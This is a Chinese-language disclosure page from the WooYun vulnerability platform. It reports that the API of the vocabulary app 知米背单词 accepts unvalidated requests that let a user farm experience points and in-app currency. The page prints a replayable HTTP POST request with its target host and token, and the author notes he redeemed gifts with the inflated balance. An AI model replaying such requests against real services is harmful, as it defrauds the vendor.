当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155418

漏洞标题:知米背单词可刷经验和知米粒

相关厂商:知米

漏洞作者: 大碗

提交时间:2015-11-24 15:43

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

API未进行提交数据的合法检验,导致可以不断地刷分刷经验

详细说明:

POST /youqu/earnUserWealth.htm HTTP/1.1
Host: 114.215.182.172:8080
Proxy-Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans;q=1, en;q=0.9, fr;q=0.8, de;q=0.7, ja;q=0.6, nl;q=0.5
Pragma: no-cache
Content-Length: 64
Connection: keep-alive
User-Agent: ReciteWords/2.5.0 (iPhone; iOS 7.1.1; Scale/2.00)
p=0&t=mkS68CHv0T7fEV2505QarCqQORqkcs8sE0903CB7Ct56Tkg2Xp&type=10
HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Mon, 23 Nov 2015 14:30:14 GMT
Content-Type: application/json;charset=UTF-8
Connection: keep-alive
Content-Length: 78
{"message":"successfully add earn record","wealth":30,"zmd":10,"success":true}

微信截图_20151124001535.png


微信截图_20151124001554.png


漏洞证明:

微信截图_20151124003410.png


顺手兑换了几个小礼品 不晓得会不会发给我

修复方案:

U know

版权声明:转载请注明来源 大碗@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价

  1. 2015-11-24 21:03 | 大碗 ( 路人 | Rank:0 漏洞数:1 | 其实我是卖GPS的)

    其实他们今天就已经把我刷的给清零了。。真的是不给一点面子